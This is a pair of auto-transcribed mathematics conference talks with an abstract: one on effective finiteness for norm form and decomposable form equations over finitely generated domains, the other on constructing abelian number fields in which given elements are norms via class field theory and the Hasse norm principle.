obtained for equations (D2) and (D3) under some additional conditions. The method of proof was again to reduce the problem to unit equations in L, use the general Theorem B on unit equations, and combine it with some effective linear algebra. The second part of my talk will be devoted to new results obtained together with Evertse. Decomposable form equations are of basic importance in Diophantine number theory. Let again A, K and K-bar be as above. By definition, a polynomial from this polynomial ring is called a decomposable form if it factorizes into linear factors, say l1, ..., ln, over K-bar. Assume that at least three of them are pairwise linearly independent. An equation of this form is called a decomposable form equation over A. For m equal to 2, this is just a Thue equation. Further important classes of decomposable form equations are norm form equations, discriminant form equations and index form equations. A norm form equation is an equation of this form, where the norm denotes the norm of this linear form, more precisely the product of the conjugates of this element, and where we may assume that alpha 1 equals 1 and the other elements are contained in K-bar. Discriminant form equations: in this case we consider this linear form, we take its discriminant, and we may assume for simplicity that 1, alpha 1 and so on are linearly independent elements of K-bar; this is then called a discriminant form with coefficients in K. Several general ineffective finiteness results have been obtained on decomposable form equations, discriminant form equations and norm form equations. First of all, I have to mention here the famous result of Wolfgang Schmidt from 1971. He proved, for norm form equations over Z, a finiteness criterion, and in addition he described the set of solutions by showing that all the solutions belong to finitely many so-called families of solutions. (The notions just introduced are restated below.)
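A hedged restatement of the objects named in this passage, in my reconstruction of the slide notation (in particular the extra property required of the monic polynomials in (D1) is the one fixed earlier in the talk, presumably that their zeros lie in the given extension G):
\[
D(f) = D \quad \text{in monic } f \in A[X] \ \text{with the stated property}, \tag{D1}
\]
with f(X) and f(X + a), a in A, called A-equivalent (A-equivalent polynomials have the same discriminant);
\[
F(x_1, \dots, x_m) = \delta \quad \text{in } (x_1, \dots, x_m) \in A^m, \qquad F = l_1 \cdots l_n \ \text{a product of linear forms over } \overline{K}
\]
(the decomposable form equation). The norm form attached to \(\alpha_1 = 1, \alpha_2, \dots, \alpha_m \in \overline{K}\) is
\[
N(X_1, \dots, X_m) = \prod_{\sigma} \sigma\bigl(\alpha_1 X_1 + \cdots + \alpha_m X_m\bigr),
\]
the product of the conjugates over K of the linear form, and the discriminant form is obtained by taking the discriminant over K of the same linear form, again a form in X_1, ..., X_m with coefficients in K.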
Later, Schlickewei extended this to the case where the ground ring is the ring of S-integers in the rational number field; in the proofs they used the subspace theorem and its p-adic version. Over finitely generated domains, several results were obtained for decomposable form equations, discriminant form equations and index form equations under certain restrictions on these forms and on the ground domain A. The method of proof was to reduce the problems to unit equations in two unknowns and use Lang's theorem. The next theorems were proved in full generality over arbitrary finitely generated domains. Laurent in 1984 gave a finiteness criterion for norm form equations. We proved a version in 1988, a finiteness criterion for decomposable form equations and norm form equations, and in 1983 Schmidt's theorem was generalized to the case of decomposable form equations over finitely generated domains, which states that in this case the set of solutions is contained in finitely many so-called families of solutions. It is important to note that in this case, if one wants to reduce the problem, one can do so, but only to multivariate unit equations; and, as is known, such a unit equation also has only finitely many solutions, but only finitely many non-degenerate solutions, those for which the corresponding equation has no vanishing subsum. Effective finiteness results over number fields: for discriminant form equations such results were obtained over Z, over O_K and over O_S, and in 1978, with Papp, for decomposable form equations and norm form equations under certain restrictions on F; here also Baker's method was used. Over restricted classes of finitely generated domains some effective finiteness results were obtained under certain restrictions on the form and on the ground domain; here already the effective specialization method was used. Consider again A and K as above, let F be a decomposable form which factorizes into linear forms, say l1, ..., ln, over K-bar, and consider this decomposable form equation. Denote by L_F the set of linear factors and suppose that it contains at least three pairwise linearly independent linear forms. Further, to simplify the presentation, we assume that the rank of L_F equals m; so in fact I restrict myself here to a special case. Definition. Following Papp and myself, we consider a graph, called the triangle graph, whose vertex system is L_F and in which l_i and l_j are connected by an edge if l_i and l_j are either linearly dependent, or linearly independent but satisfy a relation of this form with appropriate lambdas (restated below). To state the quantitative result we have to generalize the notion of size from elements of A to the case when the elements are algebraic over K. Definition. For an element alpha algebraic over K we denote by deg_K alpha the degree of alpha over K. Further, a tuple of representatives for alpha is a tuple whose entries belong to this polynomial ring and which is such that the corresponding polynomial is the monic minimal polynomial of alpha over K. We say that the degree of this tuple is at most d and its logarithmic height is at most H if the entries have degree at most d and height at most H for every i. We need another definition. Consider a tuple x in A^m. A representative for x is a tuple x-tilde with entries from this polynomial ring such that this holds for i = 1, ..., m. Then the size of x-tilde is defined as the maximum of the sizes of the entries.
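Two notions used in this passage, restated as I understand them from the verbal description (the normalizations are my guess at the slide content). The triangle graph attached to the decomposable form F has vertex set L_F, and l_i, l_j are joined by an edge when either they are proportional, or there are a third factor l_k in L_F and non-zero scalars with
\[
\lambda_i l_i + \lambda_j l_j + \lambda_k l_k = 0 .
\]
The multivariate unit equation alluded to is
\[
a_1 u_1 + \cdots + a_n u_n = 1 \quad \text{in } u_1, \dots, u_n \in \Gamma,
\]
and a solution is called non-degenerate if no proper subsum on the left-hand side vanishes; only the non-degenerate solutions are finite in number, which is why the reduction yields families of solutions rather than outright finiteness.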
The following theorem says: suppose that the following conditions hold. (a) The graph G(L_F) is connected, and the generators f1, ..., ft of the ideal I have degree at most d and logarithmic height at most H. (b) The coefficients of l1, ..., ln have tuples of representatives of degree at most d and logarithmic height at most H. If, in addition, the coefficients of l1, ..., ln have degree at most capital D over K, then every solution x of (DF1), that is of this equation, has a representative x-tilde from this polynomial ring such that the size of x-tilde can be estimated from above by an expression of this type; here the constant implied by the big O is an effective absolute constant. This theorem is effective and quantitative, and it has many applications; I would like to present some of them. Definition. A finite extension L of K is effectively given if it is given in this form, where P is an effectively given monic irreducible polynomial from this polynomial ring. In that case L can be written in this form, and then every element of L can be written in this way, where the coefficients belong to K. In this case we say that beta in L is given, respectively can be determined, effectively if these coefficients are given, respectively can be determined, effectively. The above theorem implies the following consequence for this equation. Theorem G. If the graph is connected, then equation (DF1) has only finitely many solutions. Moreover, if the coefficients of l1, ..., ln belong to a finite extension L of K, and if A, K, L, b and the coefficients of l1, ..., ln are given effectively, then all solutions can be effectively determined. The method of proof for Theorems I and G is as follows. Following an argument introduced by Papp, and using the connectedness of this graph, we can reduce this equation to a finite system of unit equations over a finitely generated overring A' of A in L. Then we can apply the effective Theorem B, respectively B', on unit equations, and utilize so-called degree-height estimates, which are new in this generality. Theorems I and G imply, for m equal to 2, Theorem D, that is, the result of Bérczes, Evertse and myself on Thue equations. It should be mentioned that in fact we proved more: we have a more general version of the result presented above, in which the graph G(L_F) is not necessarily connected, and the rank is allowed to be smaller than m. In fact, it is interesting to mention that in the case of discriminant equations and decomposable form equations we did not use effective specialization: we reduced the equations to unit equations, for which we already had effective results, obtained by means of effective specialization. So in fact we have two methods. The first is the effective specialization method: we reduce the equation to the function field case and the number field case and use effective specialization to get finiteness in an effective form. The other method: if possible, we reduce the equation to unit equations, for which finiteness in an effective form has already been proved, and then we again deduce finiteness in an effective form. In fact, apart from the Schinzel–Tijdeman equation and the Catalan equation, we can apply both methods to all these equations. Consequences of Theorem I. First, norm form equations; consider the norm form equation in the following form (restated below).
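The norm form equation referred to here, written out as I reconstruct it from the earlier verbal definition (alpha_1 = 1, the alphas algebraic over K, b a non-zero element of A; the norm is the product of the conjugates of the linear form, that is, the field norm from M = K(alpha_1, ..., alpha_m)):
\[
N_{M/K}\bigl(\alpha_1 x_1 + \cdots + \alpha_m x_m\bigr) = b \quad \text{in } x_1, \dots, x_m \in A. \tag{NF}
\]
In the next part of the talk the relevant hypotheses are that alpha_m has degree at least 3 over K(alpha_1, ..., alpha_{m-1}) and that only solutions with x_m different from zero are considered.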
From the more general version of Theorem G, that is, from the finiteness result, one can prove that if we assume that alpha_m is of degree at least three over this subfield, in fact over the intermediate field generated by the previous alphas, then the equation (NF) has only finitely many solutions with this property. Further, if A, K, alpha_1, ..., alpha_m and b are effectively given, then all solutions of (NF) with this property can be effectively determined. In fact we proved this in quantitative form. The finiteness part was already proved in 1982, and in 1983 in an effective form for the restricted classes of domains. Here the assumption that alpha_m has degree at least three and the assumption that x_m is non-zero are necessary; otherwise, if we drop them, we cannot get the finiteness result. As for discriminant form equations: consider again the discriminant form equation in this form. Then Theorem G implies the following. Under the overall assumptions concerning this equation, the discriminant form equation has only finitely many solutions. Moreover, if A, K, alpha_1 and so on are effectively given, then all solutions of this equation can be effectively determined; and we also gave a quantitative version. The finiteness result had already been proved in 1982, and in 1983 for the restricted classes. This has applications to index form equations and to integral elements of given discriminant. I should mention that we also considered more general versions of these equations, the decomposable form, norm form and discriminant form equations, in the case where on the right-hand side we replace b by b times a unit, where the unit is also unknown. Such generalizations are useful, for example, to get general results on simple ring extensions of A. Finally, I should mention that many further applications have been obtained from these theorems and from their more general versions. To finish my talk, I should mention that our general effective method provides a general program. Given a polynomial equation P(x) = 0 in x in A^m, call it (*): if we have effective finiteness results for the S-integral solutions of the corresponding equation over number fields, and effective results over function fields of characteristic zero, then our method gives an effective finiteness result for equation (*). Moreover, we can get a quantitative version if we have quantitative versions in the number field and function field cases. Thank you for your attention.
|
In the 1980’s we developed an effective specialization method and used it to prove effective finiteness theorems for Thue equations, decomposable form equations and discriminant equations over a restricted class of finitely generated domains (FGD’s) over Z which may contain not only algebraic but also transcendental elements. In 2013 we refined with Evertse the method and combined it with an effective result of Aschenbrenner (2004) concerning ideal membership in polynomial rings over Z to establish effective results over arbitrary FGD’s over Z. By means of our method general effective finiteness theorems have been obtained in quantitative form for several classical Diophantine equations over arbitrary FGD’s, including unit equations, discriminant equations (Evertse and Gyory, 2013, 2017), Thue equations, hyper- and superelliptic equations, the Schinzel–Tijdeman equation (Bérczes, Evertse and Gyory, 2014), generalized unit equations (Bérczes, 2015), and the Catalan equation (Koymans, 2015). In the first part of the talk we shall briefly survey these results. Recently we proved with Evertse effective finiteness theorems in quantitative form for norm form equations, discriminant form equations and more generally for decomposable form equations over arbitrary FGD’s. In the second part, these new results will be presented. Some applications will also be discussed.
|
10.5446/53726 (DOI)
|
Okay, yeah, thank you very much for inviting me to Illumini, even though it's only virtual this year, but things will get better again, I hope. So yeah, I'm going to talk about joint work with Rudolf Christian from UCL. And yeah, originally I was planning to do a Blackboard talk on my drawing tablet, but I found out that I'm not fast enough at writing a lege- lege-ably to give a talk in this way, so I've prepared my slides. They're still handwritten, but I've prepared them at once. I hope they're somewhat legible. Okay, so if you're given an extension of number fields, k over little k on degree n, then of course there is the field theoretic norm map from k to little k. And then if you fix the basis omega 1 to omega n of your extension, then you can write the norm map in this basis. This is a polynomial with coefficients exponent to xm, and it's from a genus of degree n. And such a polynomial is called the norm form, or that's what I call the norm form today. And given such a norm form from a number field, or from an extension of number fields, and a number, alpha, an element of the small number field, then you can look at norm form equations where you say n of x1 takes n as alpha. So norm of x1 omega 1 plus x1 of x omega n should be alpha. Now, these are very classical objects. Two kinds of questions at least have been studied extensively. First is given an alpha and a number field k, given your norm form, then you study solutions, other solutions, and so on. Secondly, given just a number field k, then when also people have also studied the set of alpha for which this equation has a solution, for example, there's some topics for a large system, so in this talk, in this project, we were looking at this sort of from the other way around. We start with elements of a small number field with k, and what we study are extensions such that all of these alphas are norms from the large field. So it's sometimes the opposite problem to these questions about here. We don't fix the elements, we fix the elements that should be norms, and we vary the extension field. And for example, one can put some restrictions on k to k, and fix the degree. One can only look at extensions of a given degree, and for example, if you get in color group, and one could also say that the local extension at certain, probably finite in many places should also be prescribed. So that's the kind of problems that I'm looking at. Let me show you a very simple example of this. So I want to find an Sn extension of q with prescribed normal alpha. So a number field of degree n whose color group of a normal closure is the full Sn, and alpha should be known from this field. I can do this by just writing down a generic polynomial, x to the n plus a n minus 1 x to the n minus 1 and so on, for which the constant coefficient is the corrective scale alpha. And then I just choose my polynomials a n minus 1 up to a 1, sufficiently generic so that it was a reducibility theorem guarantees that this polynomial is color group Sn or q. And then I just take k as my number field generated by a root of this polynomial. Then it's an Sn extension. And just by the way in which this polynomial was constructed alpha is a norm, namely the norm of this element beta, because it's here constantly efficient with the right sign. So that was easy. And that's the situation for Sn extensions. What I really want to talk about is the polar opposite of Sn extensions, that's a billion extensions. 
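To spell out the norm computation in this example (the sign convention for the constant coefficient is my reconstruction of what was on the slide): take
\[
f(X) = X^n + a_{n-1} X^{n-1} + \cdots + a_1 X + (-1)^n \alpha,
\]
choose the coefficients a_1, ..., a_{n-1} so that f is irreducible with Galois group S_n, and let K = k(beta) for a root beta of f. Since f is monic, the product of its roots is \((-1)^n\) times the constant coefficient, so
\[
N_{K/k}(\beta) = (-1)^n f(0) = (-1)^n \cdot (-1)^n \alpha = \alpha,
\]
which is exactly why alpha is a norm from K.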
The color groups are as small as possible, as simple as possible, given the first degree. So from now on, I fix my number field with k, and I fix a finite a billion group g, this should be the color group of my extension. And I also fix a set a of elements of 1 up to alpha t of little k, that should be norms from the extension. So the first result that I want to present to you is this one. That's due to myself, then Lafren and Richard. It's pretty recent. And it counts extensions k that are obedient with color group g, such that all these alphas, all these elements of a are norms from from k to k. And it counts them with respect to a quantity called the conductor. So this is this phi of k over k. So that's the absolute norm of the conductor of my extension, and this should be bounded by b. So that's the counting function of g extensions of little k, in which all alphas are norms, and whose conductor is bounded by b. It's well known that given any bound b, then there are only finitely many g extensions with conductor bounded by b, and we are counting a part of them. And this counting function behaves like a constant, times b times half the logarithm of b, all of this can be very explicit. So c is a positive constant. One could also write this constant non-explicitly, but it's okay. And this exponent here, this phi, has a very nice form. It's the sum over all elements of the group. One divided by the degree of the field extension, kg over k, where g, this is the order of this group element g, and kg or kd for any d is this number field that you get by joining to little k, the d-thruits of unity, and d-thruits of all these elements alpha that you want to make norms. Okay. So this constant here is positive. So in particular, our theorem has the corollary that such extensions always exist. So that's the corollary here. Given any number field k, any finite beginning group g, and any finite set of elements of k, then there is an extension, capital K, with color group g, such that all these elements are norms. As far as we know, that was new. But it's a corollary of a density result. And in particular, it's not quite clear how do you actually construct such an extension. Not that they exist, we know that they're infinite. Many can count them, but it's not clear how to construct them. And that's what I worked out with Udo Fischer. So we found the constructive proof of this corollary. Since it's about a billion extensions, this uses class-fit theory. So in my talk, I was planning to explain this construction to you. And in the end, to show you an example. So here is a summary of the facts from classical theory that I'm going to use. It says that extensions k, capital K of little k, together with an isomorphism from the Galois group to our prescribed group g. So these pairs of extension plus an isomorphism are parametrized one-to-one by some other sets. And these are continuous and subjective homomorphisms from the ideal class group of my number here, little k, to my group g. So it should be subjective and continuous. The topology is not going to play a role in this talk, so you can forget about this continuous if you want. So the ideal group here, this i k, put them down in a definition here. It's a restricted product over all places of my number field. And then it's the local field at this place. So that's a restricted product. This means that an element of this is a unit, a local unit in obi star at almost all places. Yeah. So that's the ideal group. 
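A restatement of the two ingredients just described, as I understand the verbal statement (the transcript garbles some of the notation: "fee" is the homomorphism phi, and the "ideal group" is the idele group A_k of k). The class-field-theoretic parametrization is
\[
\bigl\{ (K/k,\ \psi : \operatorname{Gal}(K/k) \xrightarrow{\ \sim\ } G) \bigr\}
\ \longleftrightarrow\
\bigl\{ \varphi : \mathbf{A}_k^{\times} / k^{\times} \twoheadrightarrow G \ \text{continuous} \bigr\},
\]
and the exponent appearing in the counting asymptotic (called phi in the talk; written theta here to avoid a clash with the homomorphism) is described as
\[
\theta = \sum_{g \in G} \frac{1}{[k_{d_g} : k]}, \qquad d_g = \operatorname{ord}(g), \quad
k_d = k\bigl(\zeta_d,\ \alpha_1^{1/d}, \dots, \alpha_t^{1/d}\bigr).
\]
Exactly how theta enters the power of the logarithm is on the slide and not fully captured in the transcript.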
And then k star, so the unit group of k embeds naturally in this just by mapping it to a copy of k star in each vector. And then you can mod it out. So if I've written down this parameter section again, so pairs of extensions capital K of little k together with an isomorphism of the Galer group to G parameterized studies, subjective, continuous morphisms fee. And then there is also a normal map from the idles of capital K to the idles of small k. Sorry, forget about this star here. Maybe I can. Yeah. So this shouldn't be a disaster. Okay, so how does this go? You take an idle of the big field, the local components of the w for w place, and you map it to the idle with local components that plays V. So these place of small k, the local component that we is the product over all of the places w of capital K extending your place and send you take the local norm of the course corner there. So that's the moment it does and extends the field theoretic norm. And then another important fact from cluster theory is this one. So if fee corresponds to my extension K, then the kernel of fee is the norms of the idles of K. So that's how you can detect norms using a cluster theory. And of course, it's all module little k. So this is good news and bad news. The good news for our problem is that the cluster theory is very good at detecting norms or to be more precise, everywhere local norms. So that's just elements in here that are norms of idles. And on the other hand, since everything happens modular, the actual global field that you're interested in, the bad news is that cluster theory is not good at detecting global norms because everything that's global is getting modded out. So to me the global norms, global norms are just norms from K. So that's the elements that I'm interested in. And here I have my everywhere local norms. So those are elements of little k that are maybe not norms of elements of capital K, but at least they are norms of idles in this way. And clearly everything that's a norm from an element is the norm of an idler. So we have this inclusion here. So how we can go about still detecting global norms is by something called the Hassan norm principle. So we say that our extension capital K, little k satisfies the Hassan norm principle if the following holds. So if we have equality here, if the global norms are not only contained in the everywhere local norms, but if they're equal to them. And that's good because if the extension turns out to satisfy the Hassan norm principle, then we can again apply our classical theory to detect global norms just going via everywhere local norms. So here are two classical results to Hassan norm principle. The first is that it holds for cyclic extensions. So whenever capital K or little k is a normal extension whose color group is cyclic, then it satisfies the Hassan norm principle. So we always have equality here. And again, the bad news is that for the simplest non-cyclic extensions, which are bicotrategic ones, so color group set two times set two, there are already counter examples. So this one is just due to Hassan, to join this color group minus 3 and 13 to Q, then this extension does not satisfy the Hassan norm principle. Just because it fits in, here is another result from my paper with Den-Lachran and Rachel Newton. It says that if you fix an abelian regular group, then 100% of all G extensions of little k satisfy the Hassan norm principle. So by 100%, I mean natural density 1 if you order them by this absolute norm of the conductor. 
You don't necessarily have to count number of years by a conductor. I mean the conductor is really nice invariant to count the beating extension. But another maybe from some perspective more natural invariant to count number fields by would be the discriminant. And turns out that when you count by discriminant, then things are more complicated. Then this is actually not true for many groups G. Okay, that's just an aside. Good, so we have to Hassan norm principle. Kate has formulated a powerful criterion for when the Hassan norm principle holds for an extension k over k that is normal. So I write G for the regular group of k over k and Gv for the decomposition group at the place B. So that's just the color group of a corresponding local extension for any place W, along above V, all of these are economically as more. So it doesn't matter which W you choose. And then on the right hand side here, this object is called the knot group of the extension capital K or little k. And it is everywhere local norms. So those elements of little k that are norms of sorry, this should be an IK. Can fix this. So elements of little k that are norms of adults and you mod out the global norms. And this this object is so Tate has shown that this is isomorphic to the kernel of a map between the chronology groups. So you have the third chronology of G, so third color of chronology of K over K. And you go to the product over all places of little k to the third chronology of these decomposition groups by the restriction. The car of this is as a more thick to the not group. So to satisfy the house and non principle means that this group is zero. So in other words, your extension or extension K over K satisfies the non principle. If and only this map here is injective. This is already so we already use this in the paper with them locker and Richard Newton in the following dual form. So you just take the dual of this map. So then this goes from some over the exterior square of the decomposition group to the exterior square of G. And it should be such active. So this this form was actually heavily used in this paper with them and Richard. Because I mean this. This is this is quite explicit. And. Yeah, I mean it's easy to apply. So so we have to start here and for the house and all principle. And now we're going to apply it. So this we need to see how how class theory detects these decomposition groups here. So I'm explaining this here. So if my extension is given by this subject different more efficient fee from the other class group to G and these any place, then I can look at fee V. And fee V just composes fee with the embedding of my local field into the last group. And then this decomposition group GV. As a subgroup of G will just be the image of this map TV. So everything fits together very nicely. Give all this. I can now formulate the goal of this construction. So which kinds of homomorphisms are we going to find. We want to construct homomorphisms fee such that. At all places. These elements are for one after T, which I want to be norms should be in the kernel of this local map. Fee. Okay. So what does this tell me this tells me that all the alphas everywhere local norms. If you remember from earlier, I've shown you that the kernel of the global map fee corresponds to the same holds for local class theory as well. So this first condition here says that all the elements offer. And the second condition is the one that we get from. It says that. The natural map going from the direct sum of these. 
The square of the images of TV, because images of TV adjust the decision groups. So we looked out here. To the exterior square of G, they should be such active. And then this condition. ensures that there has no principles. So taking these two together. We see that all these alphas then will not only be local norms, but they will in fact be global norms as desired. So now we construct such homomorphism fee that have these two properties. So it's, it's not a problem to do both this over arbitrary based on the fields a little k. But it's just notationally easier to do it over Q. So for now, I'm going to restrict to to indicate it was Q for this presentation. And similarly, I'm going to restrict the group G to be of this form set mode ease that to some power our. So you can go from these special G's to general being groups just by taking it to be the exponent and then you then you can reduce to the case of these groups G. And you just have to use some one occasion to get rid of this restriction that little case Q gets a bit more complicated because as usual, infinite unit group makes problems and. Well, not really cross group also creates some problems, but it's it's sort of well known how to deal with this. Okay, so now if little case Q, then one can describe this be that last group, quite simply in in more concrete way. And it's group of positive real numbers times the units of set hat, so the proof and closure of set. So if written here, what this is or how I see it. So units of set hat is the product of all primes. And then take the local units. So, P I units set P. Okay. Now, I'm going to construct these homomorphisms from units of set head to G. And then of course one can extend it trivially to this sector to get them up from either close group to G. So we've reduced to finding such a homomorphism set head start to G, still satisfying our two priorities. How am I going to do this? I need some crimes. He wanted to PR. So this are here is is this are. So we set the rank of G. Okay. So our primes that are all congruent one month. So he was the exponent of G. Such that my elements of that are going to be norms are local units of these primes. And moreover, if you reduce them, not PI, then there should be if powers in the rest of the field. So all of these conditions are Chebotaric type. So Chebotaric density theorem guarantees that there are infinitely many such primes. And if you take effective versions of Chebotaric's theorem, then you can also see how long you need to search if you're really unlucky, but you will find such primes. Okay. So I'm feeling these primes. I have everything that I need to write down the first version of this. So it goes from set hat star. Remember this was the product over set P star for all primes P. And I just ignore all the factors at all primes P except for my primes PI. And I just ignore all the other factors, so it goes to this finite product over set PI star. And then in each component, I can reduce my PI. They go to the final product from one to R to the residue fields, FPI star. And then I reduce some more. So here I've gotten something. I go to, in each factor again, to FPI star mod ETH powers. So since PI was congruent to one mod E, FPI star is a circuit group of all the divisible by E. So if I take it modulate ETH powers, then it's a circuit group of all the E. And therefore, this product here is as more effective set mod ETH to the R, which was our group G. Okay. So I have constructed this homomorphism fee from set hat star to G. 
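A toy numerical illustration of the construction just described (the transcript's "set hat star" is the unit group of the profinite completion of Z, and "fee" is phi). This is my own sketch, not the speaker's code: pick r primes p congruent to 1 mod e such that each prescribed alpha is a unit and an e-th power mod p; reducing mod each p and passing to F_p modulo e-th powers then gives a map onto (Z/eZ)^r that kills every alpha. Here it is only evaluated on integers coprime to the chosen primes, as a stand-in for the unit ideles, and the function names and toy parameters (e = 3, r = 2, alpha = 2) are made up for the illustration.

import math

e, r, alphas = 3, 2, [2]            # target group G = (Z/3Z)^2; we want 2 to become a norm

def is_prime(n):
    return n > 1 and all(n % d for d in range(2, int(n ** 0.5) + 1))

def is_eth_power(a, p, e):
    # for p ≡ 1 (mod e): a is an e-th power mod p  iff  a^((p-1)/e) ≡ 1 (mod p)
    return pow(a % p, (p - 1) // e, p) == 1

primes, p = [], 2
while len(primes) < r:              # Chebotarev guarantees infinitely many such primes
    p += 1
    if is_prime(p) and p % e == 1 and all(a % p and is_eth_power(a, p, e) for a in alphas):
        primes.append(p)
print("chosen primes:", primes)     # [31, 43] with these toy parameters

def primitive_root(p):
    m, q, facs = p - 1, 2, set()
    while q * q <= m:               # factor p - 1 by trial division
        while m % q == 0:
            facs.add(q); m //= q
        q += 1
    if m > 1:
        facs.add(m)
    return next(g for g in range(2, p) if all(pow(g, (p - 1) // f, p) != 1 for f in facs))

def component(x, p, e):
    # image of x in F_p^x / (F_p^x)^e ≅ Z/eZ, via a brute-force discrete log (fine for tiny p)
    g, t = primitive_root(p), 1
    for k in range(p - 1):
        if t == x % p:
            return k % e
        t = t * g % p

phi = lambda x: tuple(component(x, q_, e) for q_ in primes)   # the map onto (Z/eZ)^r
print("phi on the alphas:", [phi(a) for a in alphas])          # zero tuples: the alphas lie in the kernel
print("phi(3), phi(5):   ", phi(3), phi(5))                    # generic units typically hit nonzero classes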
It's obviously subjective because each of the components is subjective. And also, all the alpha is in the kernel of this map because I've chosen my crimes in such a way that they are ETH powers in these FPI star. So here, from here on, they are zero. Yeah. Okay. So what does this give me? I have this subjective map. This gives me an extension with a group G of Q. So G extension Q of Q. And all the alphas are norms of idles. So everywhere local norms. So what's missing is how I make them grow the norms where it has a non-principle. So now I need to take a look at how to implement this second part here. Feeds criterion for the has a norm principle. Okay. So how can I ensure that there has a norm principle holds? I need to use some more price. First of all. So this set of insert to the R. This was our group G. So lambda number two, the exterior square of G appears and the exterior square of such an R power. I mean, I've written it down here what it is. So you take E1 up to ER, the standard basis of set of insert to the R. And then you you wedge any two of them together and take the set of insert module generated by that. And this gives you the exterior square of set of insert to the R. So these, these here are our basis. Okay. So now instead of taking just R primes. I now need to take R over two pairs of primes, PL, QL that satisfy the same properties as above for now. So they should be congruent one E and all of my alphas, all of the elements that are going to be norms should be if powers, not PL and if powers, not QL. Yeah. And such pairs PL QL. Then I start by constructing homomorphism to call fee prime in exactly the same way as before. So I go from set hat to the set star. To the components of PL QL, then I go to the residue field and then I reduce module if powers. So I end up here at the product over L from one up to M, FPL star, not FPL star if powers times FQL star, not FQL star if powers. And then again, each of these vectors is set of E set. So here I have set of E set squared. So I have M copies of set of E set squared. And I call this G prime for now. And now, so about this here, I'm going to say a little bit later on, so that's sort of the most technical part of our construction. We now find the basis F1, F1 prime up to FM, FM prime, so two M basis elements of this G prime. That has the property that each FL, FL prime is the basis of the image of the local field of FPL star for all F. So let's just assume that we are able to find such a basis for now. Then I construct a second map of C and this goes now from G prime to a group G. And the way in which we do this is I take all pairs of elements of my standard basis of set of M basis to the R, enumerate them in some way. So I have these M pairs and then the pair FL, FL prime from this basis up here. So this pair FL, FL prime, which forms the basis of C prime of KPL star. This should go to the Lth pair, EI, EJ in this enumeration. Okay, so it's defined on the basis of G prime, so that's completely fine. This is a checkered. What am I going to do with that? I define my phi, so that's the enumorphism that I want to construct that I'm interested in. And I have the log composition of these two. So we go from set hat star first to G prime and then to G. And then since both of these components are subjective, the whole thing is subjective and we still have this property that phi of all the alpha j's is zero for all my j's. 
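(For reference, the criterion invoked in this part, as I understand the verbal statement earlier in the talk; the cohomology is with trivial integer coefficients as far as I can tell.) For a normal extension K/k with Galois group G and decomposition groups G_v, the knot group satisfies
\[
\frac{k^{\times} \cap N_{K/k}\mathbf{A}_K^{\times}}{N_{K/k} K^{\times}}
\ \cong\
\ker\Bigl( H^3(G, \mathbb{Z}) \longrightarrow \prod_v H^3(G_v, \mathbb{Z}) \Bigr),
\]
so the Hasse norm principle holds if and only if this kernel vanishes; in the dual form used here (G abelian), if and only if the natural map
\[
\bigoplus_v \textstyle\bigwedge^2 G_v \longrightarrow \bigwedge^2 G
\]
is surjective. For G = (Z/eZ)^r the target is free of rank r(r-1)/2 over Z/eZ, with basis the wedges \(e_i \wedge e_j\) for i < j, which is why r-choose-2 pairs of primes are introduced, one pair per basis element.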
Because if you look back at phi prime, then phi prime goes here to PL, not FL to the ETH powers and QL, FQL, not FQL to the ETH powers. And my primes PL and QL virtues in such a way that all alphas are ETH powers. So again, from here on, the alphas are zero. Okay, so we have still preserved this condition that we had previously, but now we have way more factors and we can use these factors to make the Asana principle work. So if you look at the exterior square of phi of some local factor KPL at prime PL. So phi of KPL is C of phi prime of KPL and the basis of phi prime of KPL are these FL and FL prime. So the exterior square of phi of KPL is the cyclic of order E and here is the basis element. But now we constructed this C map in exactly such a way that this FL, FL prime goes to EIEJ. Or for a pair EIEJ of basis elements of G. So that's how we constructed the map here. So if I take now the sum over all my pairs of primes PL, QL from one up to M of the exterior squares of the image of KPL, then this covers my exterior square of G because that's just the direct sum of all cyclic factors of this form. Okay so we have guaranteed that the Asana principle holds. I had this assumption earlier that we are able to find a basis of G prime such that each FL, FL prime is the basis of phi prime of KPL star. So now I should justify how we can achieve this. And to do so, we first need to see how we can identify this local field KPL star inside of our domain set hat star. So that's a local field. So it's a copy of the local units set field star times powers of a uniformizer because PL is a uniformizer. So it's clear how set PL star maps into set hat because set hat star was just a product over all these set P star and PL is one of these factors. So I just map set PL star to the PL factor here. And for this uniformizer PL itself, so this does not appear in any of these factors. But I can move it around a little bit because so this set hat star, this is supposed to stand for the ideal class group of Q. And in the ideal class group, everything is modular Q star. So I can multiply this for example by, well, PL inverse and then this here. So PL inverse, PL inverse and one as the PL factor, PL inverse and so on. So this is the same element as one and so on to PL one and so on. One in the ideal class group of Q. Okay. But this, this representation actually gives me, gives me this element as an element of set hat star. So that's what I'm mapping this to. And then essentially what I have to do to ensure that I can find such a basis is to choose my prime QL in this pair PL QL in such a way that X to the E minus PL is irreducible over F QL. And of course, that's again a Chebotariff condition. So once I have this, this map is subjective. So what's this map? We go now from KPS star and we embed it into set hat star in the way that I've explained here. And then I, I just go directly to the factors of P and Q to the local fields and to the local fields modular ETH powers. Yeah. So now the, this here is hit by this set PL star factor. And here this condition that X to the E minus PL is irreducible over F QL. This guarantees that this is generated by the image of PL itself. And therefore we are, we are subjective up to here. And by the way, I chose my crimes. This is again, as a more specific set, what is that? Okay. So what I've shown here is that the prime of KPL star is as more specific to set EZ square. So it has a basis consisting of two elements, FL and FL prime. 
And then what I need to make sure is that these basis elements fit well together. So they actually build a basis of G prime. And we do this in the paper using an inductive process, which is not, not terribly complicated, but maybe a bit too much to explain if you're on slides. So I won't say anything more about this, but that's in principle how it works. So let me remark that everything that I've told you so far, I mean, it may look slightly abstract, but everything is very concrete and can be implemented on a computer. And we have done so in a, so we have not really implemented it in sage in the form of a package. But we have say to actually it's in the tree, just can enter our data and then combine it with some computations by hand, we can get results. So let me show you an example here. Just a look at this out today during the metric. So I want to find a field K that's a billion over Q with color group seven or two sets cubed. So I want to find a tri-potratic field and one to to be a norm from this field. So my rank here is three, which means that I need three or two, so three pairs of primes to QL. And these pairs of primes, they should satisfy these various conditions that we've discussed. So here are the primes, so 17, 41, 73, 113, and 89, and 97. So that's P1, Q1, P2, Q3, Q3, Q3. And well, so that's the homomorphism specifying by X and Mk. Now, this is very explicit and concrete. You can read off the conductor of this if you think about it a little bit. And together with some data that comes from the construction of this, one can also read off the splitting primes. So this is a list of the first few primes that split in this extension. And then of course, if you do constructive Gaussian theory, then knowing the conductor and knowing and being able to generate all these split primes is enough to give you equations for your field. I mean, that's implemented in Magma, for example. And in this particular case, Magma took maybe a second or two to compute this concrete representation of the field. OK, I think that's all I wanted to say here. Thank you.
